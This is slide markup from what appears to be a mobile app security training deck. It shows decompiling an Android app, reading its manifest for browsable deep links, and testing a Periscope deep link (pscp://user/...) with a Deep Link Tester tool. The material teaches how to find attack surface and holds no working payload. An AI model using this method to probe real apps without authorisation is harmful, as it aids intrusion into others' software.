            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Loading</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resource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ... Regular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>manifest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> package..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Decoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> file-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Decoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> values */* XMLS ...</a:t>
            </a:r>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62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600" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Manifest</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>NOT BROWSABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>= ONLY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> apps on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>device</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>BROWSABLE = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>browsable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> &gt; browser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>File: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>AndroidManitest.xml</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>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dirty="0" err="1"/>
              <a:t>Labs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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03E77EC-2A31-12AF-FF8B-9C2FF3040188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="15546"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="4152414"/>
            <a:ext cx="7772400" cy="1951979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3906624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18730" y="3522880"/>
            <a:ext cx="8503057" cy="2214564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>scheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>pscp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> as host looks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>specifically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>pscp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>://user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>passed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The user id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a unique identifier for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>given</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> user/profile on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="16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1AB25C-3E13-4A4D-9CDA-AB2732C0247C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="13553" b="43698"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="240923" y="1226921"/>
            <a:ext cx="8287924" cy="2108200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="779351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600" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Verifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Existent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>pscp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>://user/MKBHD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Option 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Link tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Open the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Link Tester application, enter the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Link and click on the « GO TO URI »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/TmmmmmR/mobile-training/raw/master/android/DeepLinkTester.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1"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965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ADCB15-C96A-43AB-997D-07FAEA1BA004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="3195" t="10804" r="52028" b="1882"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010976" y="1483567"/>
            <a:ext cx="2995904" cy="3890866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D908FC5F-8495-4277-99B2-5CA4FE8AF065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4670258" y="1483567"/>
            <a:ext cx="3135602" cy="3882183"/>
            <a:chOff x="4572000" y="2490547"/>
            <a:chExt cx="3135602" cy="3882183"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C052B71-5A10-497D-B8B3-FEA03A9A3CE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4"/>
            <a:srcRect l="51723" t="10853" r="1412" b="2026"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2490547"/>
              <a:ext cx="3135602" cy="3882183"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Oval 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12FCDFE1-A813-4C9B-9893-F4A998EDB0E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5848201" y="3380832"/>
              <a:ext cx="583200" cy="581567"/>
            </a:xfrm>
